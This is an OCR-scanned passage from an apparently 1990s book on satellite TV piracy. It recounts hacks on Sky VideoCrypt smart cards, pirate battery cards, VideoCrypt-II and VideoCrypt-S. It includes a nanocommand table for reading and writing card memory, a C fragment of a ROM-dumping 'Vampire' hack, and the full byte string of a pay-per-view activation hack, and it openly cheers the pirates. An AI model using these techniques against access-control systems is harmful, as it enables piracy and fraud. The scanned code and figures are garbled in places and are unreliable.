Dallas 5002FP. This is a secure microcontroller that has, to date resisted all 
of the simple attempts to extract the code. It is based on the 8051 
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microcontroller, a choice that was to prove to be fortunate considering the 
core of the official Sky 10 card. 


The card had a Lithium battery as a backup for the card’s memory. At first, 
the card was referred to as the Pacemaker but the term “Battery Card” 
quickly took over. From that point on, every Dallas based card has been 
referred to as a Battery card. 


The Dallas 5002FP offered the pirates excellent security even though it was 
more expensive than the PIC16C84. However at that point, the PIC16C84 
was totally compromised. It was the beginning of the migration of the 
commercial pirates to more secure microcontrollers. 


The Battery card was significant in a more fundamental way. It took the 
onus of the upgrade away from the pirate card dealers and placed it firmly 
on the shoulders of the card user. It was the card user who would have to 
enter in the new upgrade codes each time there was an ECM. 


Entering the new codes into the battery cards was as simple as 1 2 3 or in 
another case, as simple as A B C. It was the perfect interface as anyone 
could use it. The update codes were made available via telephone 
answering machines, fax machines, BBSes and the internet. 


The lifetime of any ECM was now only a question of minutes. With the 
whole procedure of sending an ECMed card back to the dealer taken out of 
the equation, the viability of any ECM on VideoCrypt was questionable. Of 
course News Datacom did score some notable successes against battery 
cards. One of these involved an ECM that managed to overwrite a section 
of a battery card's memory. This ECM meant that users had to return their 
cards for reprogramming. But successes like this were few and were 
swamped by disaster. 


The success of the battery card in Europe meant that it was the starting 
ground for the pirate DSS cards in North America. This was due mainly to 
the robust security of the Dallas 5002FP more than anything else. However 
with the huge demand for the Dallas 5002FP, the pirate DSS cards have 
also used the predecessors of the 5002FP. The official line on this was that 
News Datacom and DirecTv have been watching the suppliers of these 
chips. The more realistic explanation is that the chip is too popular here in 
Europe. 
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NanoCommands 


The 09 Sky card was a lot more sophisticated than the 07 card. Apart from 
the improved architecture, the code was more elegant. The hash function 
was definitely more complex than the 07 as it modified all of the bytes of the 
eight byte answer in each iteration. The 07 only modified two bytes on each 
iteration. 


The enhancements did not end there. The card also contained the routines 
to allow Sky to reprogram the card over the air. This was later used to great 
effect by hackers and pirates who reprogrammed the 09 cards as D2-MAC 
and VideoCrypt-Il cards 


The method of doing so was to include a special 74 packet in the over the 
air data. This packet was slightly different from the average 74h packet in 
that instead of including a batch of card id numbers to be turned on or off, it 
had a set of instructions that the card reads and processes. 


The card id numbers and indeed the nanocommands were encrypted with a 
small algorithm. This algorithm used the Card Age byte (Byte 01) and the 
Nanocommand Decrypt Key byte (Byte 02) as the seeds. The output of the 
algorithm was EXORed with the Packet Command byte (Byte 03), the Card 
ID bytes (Bytes 07 - 10) and the nanocommand bytes (Bytes 12 - 26). In an 
ordinary card turn on/off packet these nanocommand bytes would be the 
least significant bytes (fifth byte) of the card ids to be addressed by that 
packet. 


The Card Age byte generally changed each month. It is possible to generate 
a table of outputs for a given Card Age byte and each possible Nanocom- 
mand Decrypt Key. These tables were published regularly in the Usenet 
newsgroup alt.satellite.tv.europe. While this was not strictly necessary once 
the algorithm is known, a lot of people used these tables in their home made 
blocker programs for the PC. 


The Packet Command value that indicates a nanocommand packet was 
generally 80h. This meant that the card interpreted bytes 12 to 26 as being 
instructions to be acted on. 


By using these nanocommands, Sky was able to write to the cards while 
they were in the blockers. The interesting thing is that during the lifetime of 
the Phoenix, it was pointed out that the sequence of the least significant 
bytes of the card id had become irregular. With the 07 issue, the values 
were consecutive. The significance of this was generally overlooked by the 
hackers at the time. It became painfully clear to the pirates when the 
Phoenixed 09 cards started to be killed in the blockers. 
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The use of nanocommands in the over the air addressing scheme is a very 
powerful and dangerous option. It is powerful because it gives a somewhat 
limited addressing system a new lease of life. It is dangerous in that it also 
gave the potential hacker a whole new set of tools to play with. It was a set 
of tools that proved fatal to the 09 card as it allowed the hackers and pirates 
to dump out the address space of the card. 


Some of the nanocommands just execute the hash function twice with 00h 
as the input. It may have been that these nanocommands were left relatively 
unprogrammed for future use. There is a clear difference between 
nanocommands that appear to be purely cryptographic (iterate the hash 
function) and those that can load or read data from memory. 


A central element of the nanocommand concept is the pointer. This pointer 
value is incremented by the number of bytes in the nanocommand after 
each nanocommand is executed. In some of the nanocommands, the 
pointer value is used as the input to the hash function. This further 
complicated the procedures and made the nanocommands more difficult to 
initially understand. 


Purely Cryptographic Nanocommands 
OCh (2 Bytes) Iterate Hash Twice. Inputs: 00h On Each Round 
14h (5 Bytes) Iterate Hash Twice. Inputs: 00h On Each Round 
1Dh (2 Bytes) Iterate Hash Twice. Inputs: 00h On Each Round 
24h (3 Bytes) Iterate Hash Twice. Inputs: 00h On Each Round 
34h (4 Bytes) Iterate Hash Twice. Inputs: 00h On Each Round 
FFh (1 Byte) Ітегате Hash Twice. Inputs: 00h On Each Round 
3Ch (1 Byte) Ітегате Hash Twice. Inputs: 3Ch On Each Round 
41h (1 Byte) IterateHash Twice. Inputs: 41h and 00h 
49h (1 Byte) Ітегате Hash Twice. Inputs: 60h and 49h 
19h (1 Byte) Ітегате Hash Twice. Inputs: Pointer and 19h 
03h (1 Byte) Ітегате Hash 64 Times Then Break Inputs: Pointer 


Control Nanocommands 

46h (1 Byte) Break And Exit Nanocommand Processing 
Read/Write Nanocommands 

09h (3 Bytes) Format: 09h xx yy 


This is an address loader for the 30h nanocommand where xx is the MSB of 
the address and yy is the LSB of the address. The hash function is then 
iterated twice with inputs values 63h and 00һ. 
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OFh (2 Bytes) Format: OFh aa 


Writes the data aa to address defined by the values stored in BFh (Holds 
MSB of address) and COh (Holds LSB of address). 


11h (3 Bytes) Format: 11h aa xx yy 


Writes the data aa to the address xx yy where xx is the MSB and уу is the 
LSB. 


30h (2 Bytes) Format: 30h сс 


This is specifically a read command. The value cc is the number of bytes to 
be read. The starting address is set by the address loaded by the 09h or the 
11h nanocommand. The maximum number of bytes that can be read is 
127. If cc is zero then only a single byte is read. The hash function is 
iterated with each byte read. 


39h (2 Bytes) Format: 39h aa 

Writes the data aa to address 0092h and then iterates hash function with 
input 00һ. 

11h (4 Bytes) Format: 11h aa xx yy 

Writes value aa to address in RAM specified by xx yy. The Sky 09 card has 


128 bytes of RAM, from 0080h to OOFFh. If the value in xx is non-zero, 
indicating a ROM address, the write operation is not executed. 


28h (5 Bytes) Format: 28h aa bb cc dd 


Writes nanocommand string aa bb cc dd to RAM addresses 008Dh to 
0090h. It then iterates the hash function twice with the inputs value dd and 
pointer. 


Memory Map Of The 09 Тһе best way to understand 

Sky Card and DSS 01 Card the operation of the nanocom- 
MC68HCO05SC21 mands and how the various 
қ areas of memory аге selected 

00007009F Registers is to examine the source code 


0080-00FF RAM (128 Bytes) of one of the Vampire pro- 
0520-10FF EEPROM grams available for popping 
1100-1FF7 ROM Page 0 the 09 Sky cards. 

1100-19FF ROM Page 1 One of the better programs for 
1FF8-1FFF ROM User Vectors this is the GETROM program. 
RAM: 128 Bytes This is available from most 


good BBSes and the WWW 
ROM: 6144 Bytes and FTP sites listed earlier іп, 
EEPROM: 3008 Bytes the book. 
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The VideoCrypt Vampire Hack 


The downfall of the 09 card may be attributable to the use of the 
nanocommands. As the knowledge of the hackers grew, the applications of 
the nanocommands became clear. Of course there was a learning curve 
here. The hackers really had to examine the packets coming over the air 
and watch News Datacom and sky using the nanocommands. In this 
manner it was possible to build up a list of the nanocommands. The 
commercial hackers, however, did things differently. Since most of them 
had dumped the card it was again a learning curve. But for they had an 
advantage, they had the full dump. The ordinary hackers had to wait and 
see. 


In a move that would have been clever otherwise, News Datacom had 
made it possible to use a byte from anywhere in the entire address space of 
the smart card as the input to the hash function. It was as if News Datacom 
had read the first part of a two part article | wrote a few years ago about this 
technique. The second part of the article was about the dangers of using 
such a technique - primarily the fact that it would also allow the memory 
space to be dumped if the algorithm was compromised. This is exactly what 
happened with the 09 and the nanocommands. Describing them as a Trojan 
Horse would be a very bad pun. 


The Vampire hack is effectively where the lifeblood of the smart card, its 
memory space, is extracted. It is, | admit, a rather gruesome name but the 
alternative was the “Count Zero” hack. In some respects this hack built on 
the knowledge obtained during the Phoenix hack. It use a lot of the same 
source code. 


There are four requirements for the Vampire hack. The first is a working 
implementation of the hash function. This is necessary as the state of the 
answer bytes has to be tracked through the whole process. The hash 
implementation is also required to generate a valid hash signature for the 
packet. 


The second requirement is the algorithm for generating the EXOR tables. 
These codes will be EXORed with the packet data before the checksum is 
generated. On some of the earlier versions of the Vampire hack, the 
algorithm for generating the EXOR table was not available so the complete 
EXOR table for that month was included in the source code. 


The third requirement is a working knowledge of the nanocommands. The 
basic commands in the Vampire hack are the 09h address loader, the 30h 
data processor and the 03h break. It is necessary to know how many hash 
iterations are effected by each nanocommand. 
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The fourth requirement is some sort of recovery routine. This routine will 
exhaustively search for the data byte used in the 30h command. This is 
perhaps the most intensive part of the algorithm and some hackers decided 
to leave this stage until after the results are obtained from the card. 


Stage 1: Nanocommand Generation 


Basically this stage involves setting the address bytes that follow the 09h 
command. 


Stage 2: Encryption Of Packet Data 


This is where the Nanocommand Decrypt Key algorithm is applied to the 
packet data. It EXORs the output of the encrypt algorithm with the 
nanocommands and other data. 


Stage 3: Hash Signature Generation 


The packet presented to the card has to have a valid hash signature 
otherwise the card will reject it. Again the working implementation of the 
hash function is required. In many respects this process is identical to the 
original Phoenix program. 


Stage 4: Packet Sent To Card 


The Vampire packet is sent to the card. The circuitry used for this stage is 
the same as that used for the Phoenix hack. 


Stage 5: Answer Packet (78) Recorded 


The answer packet from the card would be recorded in a file along with the 
address of the data, the nanocommands used and the state of the answer 
bytes just prior to the execution of the nanocommands. Alternatively the 
process could be executed prior to stepping to the next byte. 


Stage 6: Data Recovery 


Theoretically this is a simple stage. In practice it is complex. The state of the 
answer bytes prior to the execution of the nanocommands is known. 
Therefore by iterating the hash function to try and obtain the same results it 
is possible to comparatively recover the data. The process used here is an 
exhaustive search. The potential for errors does exist but it is the simplest 
way, short of reverse-engineering the card, of obtaining the contents of the 
card memory. 


There are now at least three different programs available for dumping the 
contents of the Sky 09 card. The commonest one is the GETROM program. 
Two disassembler programs exist for decompiling the Sky 09 smart card 
program. 
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Fragment Of The Vampire Hack Code 


Courtesy Of Markus Kuhn 
/*The token stuff in decode_b: */ 
de. xor (msg); 
if (msg[3] == 0x80) { 
abort_loop = 0; 
/* process special ECM nanocommands */ 
for (5 = 0; 5 < 15 && !abort loop; s++) 
switch (msg[s + 12]) { 


саѕе 0х03: 
abort_loop = 1; 
5--; 
break; 
case 0x09: 
adr =msg[++s + 12] < 8; 
adr |=msg[++s + 12]; 
kernel_b(0x63, answ); 
kernel_b(0, апи); 
break; 
case 0x19: 
kernel_b(s, апѕм) ; 
kernel. b(0x19, answ) ; 
break; 
case 0x30: 
S++; 
for (j =msg[s + 12]; j >=0; j- { 
if (rom try >= 0) 
b-rom try; 
else 
b = adr. space[(adr + j) & Ox1fff]; 
kernel b(b, answ); 
} 
kernel_b(b, answ); 
kernel. b(Oxff, answ) ; 
break; 
case 0x46: 
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final = 0; 
abort_loop = 1; 
break; 
other: 
S += Oxcb; /* ??? mc */ 
} 
} 
/* final 64 iterations */ 
for (1 =0; 1 < final; i++) 
kernel. b(s, апи); 
answ[7] &= 0х7Ғ; /* only 60-bit are needed by decoder */ 


/*and the horrible rom sucker ... */ 


void suck rom(void) 
1 
long address; 
extern int rom try; 
int match; 
unsigned char card. answ[8], season7. answ[8]; 
unsigned char msg[32]- ( /* an example 0x74 message */ 
Oxe8, 0x43, 0x66, 0x80, 0x00, 0x00, OxOc, 0x89, 
0x01, 0x02, 0x03, 0x00, 0x09, Oxff, Oxff, 0x30, 
0x00, 0x46, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 
0x19, 0x19, 0x19, Oxff, Oxff, Oxff, Oxff, Oxff 
}; 
for (address = Ox1ff0; address < 0х2000; address++) { 
fprintf(stderr, “%041x\r”, address); 
msg[13] = address > 8; 
msg[14] = address & Oxff; 
/* create signature */ 
de. xor(msg) ; 
decode(msg, season7. answ) ; 
de xor(msg); 
/* ask card */ 
query(msg, card answ); 
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/* compare with all possible values mc */ 
match = -1; 
for (rom_try =0; rom_try < 256; rom_try++) { 


decode(msg, season7_answ) ;if (!memcmp(card answ,season- 
7_answ, 8)) {if (match >= 0) 


fprintf(stderr, "Doublematch at %041x: %d and %а! \п”, 
address, match, rom_try); 
else 
{ 
match = rom_try; 
printf (“%041x: %3d %02х %c\n”, address, match, match, 


(match < 32 || match > 126) ? °.’ : match); 
} 
} 
de. xor (msg); 
} 
if (match == -1) 
printf (“%041x: ??????????????Xn", address); 
de_xor (msg); 
} 
return; 
} 
The 09 Season Program 


The first working 09 Season program appeared on Christmas Eve 1994. It 
was the product of a group working outside of the TV-Crypt. By January 1995, 
the implementation was stable. The initial version was PC based. An Apple 
Macversion followed. This hack was called the Deep Space 9 hack though 
some more correctly knew it as the Deep Sh*t 9 hack - an exact appraisal of 
Sky's situation. 


However later that Spring, the frustration of seeing all the self-styled experts 
claiming authorship boiled over. The source code for the program, which had 
been kept in fairly limited distribution, was publically released. The number of 
09 Season implementations mushroomed. 


The source code for the 09 hacks could not be included here due to space 
contstraints. However it will be included on the Black CD-ROM currently in 
preparation. 
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Black Tuesday - The 09 To 10 Transition 


Around 10:00 on Tuesday the 31st it started; a few channels at first. It was 
like a public execution of old. The trapdoor opened. The condemned fell 
through. The rope slowly, painfully and all too visibly choked the life out of 
the condemned. It was the 09 code that played the role in this drama. By 
sunset it was all over. Both pirate and official 09 cards were dead. 


This was no ordinary 09 ECM. The date code had changed to 86h. A few 
hours earlier it had been date code 51h. In terms of months the date code 
had advanced fifty three months - just over four years. 


In a mad panic, some people tried every one of the SEASON programs in 
the vain hope that one at least would decode the new codes. None did. 
Some pirate card users telephoned their dealers and got through to 
answering machines. But this time it was different. The pirate card users, 
had in the main, been briefed to expect this switchover. Most of them had 
gotten more than their money's worth from the pirate cards. 


In the final months of the 09 code, the prices for PIC16C84 based pirate 
cards had dropped to around £25 with a £5 upgrade charge each time there 
was an ECM. This time around there would be no cheap upgrade. As with 
the last days of the 07 code, the market had become saturated with pirate 
cards. With the 09 code, there was a very clear reason for this saturation - 
the total collapse of security on the PIC16C84 chip. After all it could be 
popped with a diode. As a result everyone had the 09 code. 


From the start there were murmurs that the new code would not be as freely 
available. More secure microcontrollers would be use the next time around. 
This would ensure that the new code remains secure. It seems ironic now 
that even the pirates had problems with pirates. At the moment the only chip 
that has not been overtly popped is the Dallas Semiconductor 5002FP. This 
is the microcontroller used on the Megatek, Cardtronics and Benedex 
Battery Cards. 


Within a few hours of the switchover, an update appeared on Megatek's 
world wide web (WWW) homepage It stated that the Sky 10 code had gone 
into operation on the morning of 31/10/95. It pointed out that Megatek would 
have the new code for the Battery Card available in six to eight weeks. It 
was to be April 5th 1996 before the first working Megatek Battery card 
appeared. That day, Easter Friday, is also known as Good Friday in Ireland. 
For the pirates it was a downright excellent day. The range of headlines was 
staggering. It could have been called the Crucifixion hack or the Resurrec- 
tion hack. In the end only one thing mattered - the Sky 10 card had fallen 
prey to the pirates once more. 
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The Collapse Of Sky 10 PPV 


“PPV customers will have to ring our subscriber management 
centre to get their cards authorised for a particular event. 
We think that we’ уе got a pretty safe system.” 

David Elstein, Sky’s director of programming expressing his confidence 

in the security of Sky’s PPV. 


Well the system may be pretty but it was definitely not safe. The hack on 
VideoCrypt's PPV system was an embarrassment for Sky though it was not 
the complete disaster that it could have been. 


The time between Black Tuesday and Good Friday was not uneventful. In 
the midst of all the fake blocker code and fake activator code, one event 
shook Sky to the core. Their first public PPV event, the showing of the 
Bruno-Tyson Fight, was compromised. It was expected that the event would 
be hacked on TV1000 and via the DDT hack on VideoCrypt. What occurred 
staggered most people associated with the business - a Phoenix hack 
authorised the PPV event on existing Sky 10 cards. 


The Phoenix hack surfaced early in the morning (approximately 0300 Hrs) 
of 16/03/1996 as a message from one Sam Chisum. Naturally this was an 
alias. We do not believe that this was the same Sam Chisholm associated 
with Sky. The message stated that a set of data when sent to a Sky 10 card 
would activate PPV and give the EVENTS PAID 66 message. At that time, it 
was a case of hoping that it would work. The event was not due to start until 
the early hours of Sunday morning so there was no reliable way of testing it 
in advance. 


Most hackers had made alternative arrangements - the fight was also being 
shown on TV1000. Many, however, were eager to try out the new hack. 
Some, having seen the original message on various BBSes and news- 
groups took the data and incorporated it into phoenix programs. The 
FREETYSO.EXE was perhaps the most widely used one primarily because 
its author did such a good job of distributing it. 


By lunchtime on Saturday, the hack was coded into the format of an EXE 
file that could be used with the Phoenix / Season interfaces. The European 
satellite newsgroups on the usenet was flooded with uuencoded versions of 
the new PPV activator program. These programs were also uploaded to all 
of the major satellite television BBSes in Europe. Some UK BBSes also 
carried them. 


The hack also appeared at all of the major WWW sites handling satellite 
television hacks. The Paranoia site (www.paranoia.com/-defiant) referred 
in the message is one of the main sites for this kind of software. It is situated 
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in the USA, well outside UK jurisdiction. Most of the UK sites handling this 
type of software did not have it posted. However, the usenet groups were 
carrying the software. 


By the time Sky started to transmit the fight, there were obviously thousands 
of extra viewers either via TV1000 or via Sky. The reason for the low 
estimate is that the main event took place at 0500 Hrs when most people 
would be asleep. 


Sky and News Datacom were obviously not asleep. It would probably be 
accurate to say that they were in a mad panic. ECMs were tried and they 
failed. This went on as the night progressed. It was futile. The hackers had 
won and Sky's PPV mechanism lay smashed. 


It is very difficult at this stage to ascertain the number of legitimate Sky 
cards that were activated for the event by the Phoenix hack. With the 
growing accessibility of internet and dial-up BBSes, the figure is probably 
under fifty thousand. The problem for Sky is not the immediate losses 
caused, but rather the loss of credibility. In order to have a reliable income 
from a PPV event, it is first necessary to have a reliable and secure system 
of delivery. If the system is compromised, then further events are in danger. 


The fact that Sky are making noises about implementing some form of PPV 
in late 1996 should be worrying for the film producers. If the PPV event can 
be hacked once, then there is a very real chance that it will be hacked again. 
Given that the pirate Battery cards are in operation, there is a whole new 
avenue of piracy opening up in Europe. 


The Message That KO'd Sky's PPV 


send this header to your card via a season interface followed 

by the bytes below 

53 86 01 00 2D 

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 00 00 00 00 00 db 
fd fO b7 


and your card will gain the credits for the Tyson Fight. | dont know about 
cards that are turned off but they gain the events anyway 


Sam Chisum. 


Important: please distibute this file as quick as possible can somebody 
put it on Paranoia. 
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The Sky 10 Card 


There are two chips on the Sky 10 card. This is the reason for the extra 
pads. These pads, while electrically being ISO compatible are just to cover 
the larger area occupied by the 10 card’s chips. 


One of these chips is a Siemens smart card microcontroller. The other is an 
ASIC. It was the ASIC that was to cause most problems to the pirates intent 
on reverse engineering the card. Reversing the microcontroller was a 
straightforward operation and was completed before the activation of the 10 
card. The ASIC, however, took slightly longer. 


The card is based on a Siemens microcontroller and it has some very 
strong commonalties with the Dallas 5002FP. Both the Siemens smart 
cards and the Dallas 5002FP are based on 8051 architecture and op-codes. 
Though while the Dallas 5002FP boasts all sorts of security elements, the 
Siemens chips have modified the architecture to allow the instructions to be 
executed faster. They can also work from 1.0 to 7.5 MHz. Other 
modifications to the op-codes can be expected. It is a common tactic with 
customised microcontrollers to make some commands behave differently 
and in some cases inversely. This makes emulating them with a conven- 
tional microcontroller more complex as one command on the smartcard 
may take two or three on the pirate emulator. 


The clock speed of the interface on the VideoCrypt decoder is set by the 
Answer to Reset. This it the packet returned by the card to the decoder 
when it is inserted. It still takes a 3.5 MHz clock. 


According to some sources, the ASIC is on then serial data line and acts as 
a UART or buffer for the data flowing to the microcontroller. In this manner 
the microcontroller can process the data in a more orderly fashion, 
requesting bytes from the ASIC when it is ready to process them. As a 
result, cycles are devoted to a more complex algorithm than that used in the 
07 and 09 cards. 


The use of the ASIC is not limited to the seed generation. It is believed that 
the authorisation and deauthorisation procedures rely heavily on the ASIC. 
This means that a Phoenix interface for the 10 card would have to have a 
working Sky 10 ASIC as part of the set up. This would not be difficult for 
people used to working with the card. 


If the card’s microcontroller is a Siemens chip, then the question as to the 
exact chip has to be examined. There are four candidates. The specifica- 
tions for cards are given in the table below: 
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Type ROM EEPROM RAM PROM 

SLE 44C10 8K 1K 256 bytes 32 Bytes 
SLE 44С40 8K 4K 256 bytes 32 Bytes 
SLE 44С80 16K 8K 256 bytes 32 Bytes 


There is a more advanced processor type available from Siemens. This 
microcontroller includes a Crypto Coprocessor for handling RSA calcula- 
tions. Of course this is the more expensive option, and one that News 
Datacom would be unlikely to go for unless they intended to introduce 
Digital Television in the lifetime of the 10 card. This seems unlikely as the 
10 card seems to be intended to last until late 1997. Sky intends to 
introduce digital television by then. 


Type ROM EEPROM RAM PROM 
SLE 44C200 8K 2.5K 256 + 350 bytes 32 


Trying to narrow the options down is difficult though not impossible. The 
most obvious choice for the new card would be the SLE44C80. The reason 
for this is that the SLE44C40 is more similar to the Motorola IC used for the 
09 issue and the SLE44C200 might be too expensive and it would be 
overkill considering that the Sky 10 card also contains and ASIC. 


The Megatek 10 Battery Card 


On April 5th 1996, the death of the Sky 10 card was announced. Megatek 
declared that their pirate Sky 10 cards were available. In Ireland, the day 
was Easter Friday, otherwise known as Good Friday. 


The range of possible headlines was startling. Could it be called the 
Crucifixion hack as it came to prominence on Good Friday? Or could it be 
called instead the Resurrection hack as it signaled the restarting of the 
pirate Sky card market? In either case, the ramifications for Sky are dire. 
The hack on the Sky 10 card had finally hit the market and with it any 
confidence in the future of Pay Per View on the 10 card should evapourate. 


For the weeks prior to this announcement, the rumours flowed through the 
pirate world. The launch of the pirate hack was imminent though nobody 
was sure when exactly it would occur. Some were expecting a hack to 
surface around the time of the Cable And Satellite Show in London (15, 16, 
17th April). The Megatek WWW page did mention that the delivery would 
occur within seven to ten days. This put the time very close to the Cable And 
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Satellite show. It was another humiliating show for Sky. This was to be their 
third Cable and Satellite show in a row where their card had been 
compromised. 


The Megatek battery card is based on the Dallas 5002FP microcontroller. 
This microcontroller has proven to be one of the more robust microcontrol- 
lers in terms of security and most of the attempts at popping it have not 
been successful. This clearly differentiates it from the simply popped 
PIC16C84. Of course even the Dallas 5002FP is not sufficient to emulate 
the Sky 10 card. 


The ASIC (Application Specific Integrated Circuit) in the Sky 10 card was 
perhaps one of the major factors in the delay in getting the 10 hack to the 
market. It is a 4500 gate ASIC and it was essential that it was reverse- 
engineered and emulated for the hack to work. Megatek stated that they 
had a specially developed integrated circuit, called the “Skylark” chip 
mounted on this extra board. 


The Megatek "Skylark" chip is an ACTEL A1280XL. This device has 8000 
gates and the data sheet is available from the ACTEL Corporation's WWW 
site. Megatek had scrubbed the identification numbers from the device. It is 
essentially identical to the official Sky ASIC. The result is that even if the 
pirate ASIC supply is interdicted, the hackers and pirates can still use the 
ASIC from official cards. Currently there is a growing trade in deauthorised 
official Sky 10 cards. These either end up being scavenged for their ASIC or 
turned into Phoenixed 10 cards. 


The upgrade to the existing battery card also required that the Dallas 
5002FP to be reprogrammed. As a consequence of this, the upgrade card 
could no longer decode the D2-MAC EuroCrypt channels. 


Megatek were injuncted by an order from the Irish High Court gained on foot 
of the UK proceedings. As a result they are no longer able to trade. 
However this does not mean that the supply of pirate 10 cards has been 
stopped. Pirate battery cards are still widely available throughout Europe 
and Cardtronics (http:/Awww.iol.ie/~ctx) seem to have taken over Megatek's 
market position. 


News Datacom implemented an ECM against the Battery cards on 
05-August-1996. It was effective and it knocked out every battery card 
design in Europe. However the Phoenixed 10 cards are still operational. It is 
expected that the new update codes for the Battery cards will be available 
within a few days. 
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VideoCrypt-II (VC-2) 
The VideoCrypt-ll system was developed for use in Europe as opposed to 
the VideoCrypt-1 system which was only employed in Ireland and the UK. 
The system is a direct evolution of the VideoCrypt-1 system and the 
technology and the protocols are largely the same. 


The primary reason for developing this variant was to serve a growing 
European market. Some channels such as Discovery had deals with 
European cablenets and as a result they wanted to serve the European 
satellite market as well. The strenght of the VideoCrypt-ll variant is that its 
datastream can be carried simulataneously on a VideoCrypt-1 encrypted 
channel. Therefore the one channel can be distributed in two copyright 
areas using different cards. 


It is not known if the variant was a somewhat less than successful 
byproduct of a Sky/Murdoch plan to enter into the wider European market. 
At the moment FilmNet is using the variant for a movie service aimed at 
Eastern Europe. MTV and Discovery are also using the variant but it has not 
been widely successful. There are continuing rumours that the hard core 
version of the Adult Channel, Eurotica, will switch to this variant for 
European distribution. However some sources consider that the real reason 
that the Adult Channel is not too worried about piracy is that it makes more 
money from the premium phoneline services advertised on its channels 
than it makes from the subscriptions. By moving from one compromised 
variant (VideoCrypt 07) to another compromised variant would only result in 
extra hassle and a minimum of subscribers. This is because the channel 
has to compete with the hardcore porn output from TV1000 and FilmNet. 


The VideoCrypt-ll system has some slightly different packet sizes com- 
pared to VideoCrypt-1. This tends to confirm that News Datacom has 
resolved some of the problems they had with implementing the Fiat Shamir 
ZKT on VideoCrypt-1. 


According to some sources, the ZKT is used in the seed generation. The 
ZKT result is EXORed with the hash function output in order to obtain the 
correct seed result. Therefore if the theory of the operation of the ZKT is not 
full understood by the hacker or pirate then the hacker card will not work 
properly eventhough it is producing the correct result from the hash 
function. 


Apart from the integration of the ZKT into the seed generation, there are 
other refinements. The data rate of the card in the VC-2 is 38K4. This allows 
for a higher rate of data and it makes developing a pirate card more difficult 
as the timing is more critical. The fact that the PIC16C84 does not have a 
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multiply instruction seems to be exploited by this as the ZKT involves a lot of 
such calculations. Therefore the ZKT routines on the official card would 
naturally be faster. 


Many of the hacks on the VideoCrypt-ll variant have been Battery card 
based hacks. Recently there have been reports of PIC16C84 based hacks 
in Italy. However in an attempt to stop the program being dumped from the 
PIC16C84, one of the pins essential to the serial programming procedure 
has been cut by drilling into the case thus severing the line. This was a fairly 
simpleminded attempt and it would not actually stop anyone who under- 
stood electronics, rather than computer science, from popping the top of the 
chip and rebonding the pin. It may well be as simple as just popping the top 
of the chip and resoldering the pin with a fine tip soldering iron. According to 
some sources this is how the VC-2 PIC16C84 was popped. 


The VideoCrypt-ll variant currently uses a Sky 07 algorithm with a different 
keyset. The use of the ZKT in the process means that the usual 
cryptographical approach to recovering the keyset will not work as the ZKT 
result has to be EXORed against the seed to remove it from the equation. 
And if the data sets for doing this was known, then there would be no 
reason to try and recover the key. 


The primary difference in the packet sizes between VideoCrypt-1 and 
VideoCrypt-ll is that the 72h and 7Ch packets аге 64 bytes (40h) long. This 
would indicate that there is an extra level of teiring and authentication 
compared to the VideoCrypt-1 packet lengths. 
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VideoCrypt-S 
VideoCrypt-S was developed by News Datacom, Thomson and the BBC. 
The primary user of the system is the BBC Select service. This was an after 
hours pay television service. It carries varied programming from medical 
programming to business advisory programming. Above all these pro- 
grammes were intended for audiences who are willing to pay. 


Through a combination of factors, the Select service collapsed. VideoCrypt- 
S decoders can actually be purchased on the surplus market for about £5 
per decoder in quantity. It was a pityful end for such a system. However it 
does seem to indicate that national television stations fare badly in pay 
television because they do not have the correct ruthless attitudes to survive 
in the Pay-TV market. 


The time slot of the programming holds its own special problem. Since the 
programmes were being aired after the main channels had closed down, 
most of the potential viewers would be asleep. Therefore it was necessary 
to include a timing circuit so that the programme could be videotaped for 
later playback. 


The cut and rotate technique of scrambling can send shivers down the 
spines of cable television engineers. The main technique of cable distribu- 
tion relies on transverting an off air-signal and sending it through the cable 
network. In some larger nets, the signal is demodulated first and then 
remodulated and upconverted for distribution. 


The weakness of a cut and rotate system is tilt. That it where the join points 
on the descrambled signal do not exactly match. This results in a lot of low 
frequency noise and glitching. The non-linearities on a cable system will 
accentuate this tilt problem. VideoCrypt has overcome this tilt problem and 
the satellite transmissions are relatively clean. On a cable system, the signal 
environment is controllable. The main amplifiers are temperature controlled 
as well as being gain controlled. The BBC Select service faced a different 
problem. The signal was to be distributed terrestrially via UHF transmitters. 


System Operation 


Line shuffle is where the order of a block of lines is changed. Line 1 might 
become line 10 in the scrambled order. The lines would then be restored to 
their proper order. This sounds simple but it is complex in reality. 


The VideoCrypt-S system is based on a block scramble. Each block is forty 
seven lines with six blocks per field. The other lines in each field are 
reserved for teletext, VBI and access control data. 
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There are three scrambling modes available: 
Full Shuffle 282 Lines 
Half Shuffle - Every other field is shuffled 
Clear Video Delay 


The full shuffle and the half shuffle effectively destroy the picture. The block 
delay is not as secure as Discret has shown. When the modes are all used 
at the same time the effect on the picture is impressive. The clear block 
delay can outline the block and make analysis easier. 


Access Control: 


The access control system is based on the VideoCrypt system. Therefore it 
is smart card based. The scrambling is governed by a permutation 
generator. The seed for the generator is a 20 bit word derived from data 
transmitted over the air in an encrypted form. 


The smart card holds the entitlement data, the user profile and the 
decryption algorithm necessary to decrypt the over the air data. In this 
respect it is the same as the ordinary VideoCrypt smart card. 


Decoder Circuitry: 


The main difference between VideoCrypt-S and VideoCrypt is the type of 
scrambling technique. VideoCrypt-S uses line shuffle and therefor requires 
a greater RAM storage. The shuffle is controlled by an ASIC. This ASIC was 
developed by Thomson. 


According to an official paper on the system, the ASIC is the heart of the 
system. The ASIC handles the data extraction, the memory allocation and 
the permutation generation. The data is extracted from the VBI lines and 
processed. Then it is fed to the decoder microcontroller bus. 


The housekeeper microcontroller in the VideoCrypt-S decoder is an 8052. 
According to sources, the program is unprotected and not dissimilar to that 
in the 8052 in the ordinary VideoCrypt decoder. The video ADC and DAC 
stages are similar to those of the ordinary VideoCrypt decoder. 


Will VideoCrypt Hacks Work? 


With the system falling into disuse, most of the following is now of historical 
interest. 
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VideoCrypt-S Architecture 
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Some of the hacks that worked on VideoCrypt will work on VideoCrypt-S. 
The EPROM card write voltage hack will work but only if that type of card is 
employed. This is unlikely as Sky were so badly burned on this one that they 
had to bring out a new card issue to stop the hack. 


Since most of the program in the 8052 housekeeper microcontroller is the 
same as that in the ordinary VideoCrypt, it is probable that this hack will 
work. 


The smart cards used by the services could probably have been hacked if 
there was a demand. Of course here lies the most important aspect. There 
is no point in commercially hacking a system only to find there is no demand 
for the hack. 


References: 
Hack Watch News - Various Issues 


IBC Technical Papers 1992: BBC Select: A Terrestrial Subscription 
Television Service. The BBC Select Decoder 


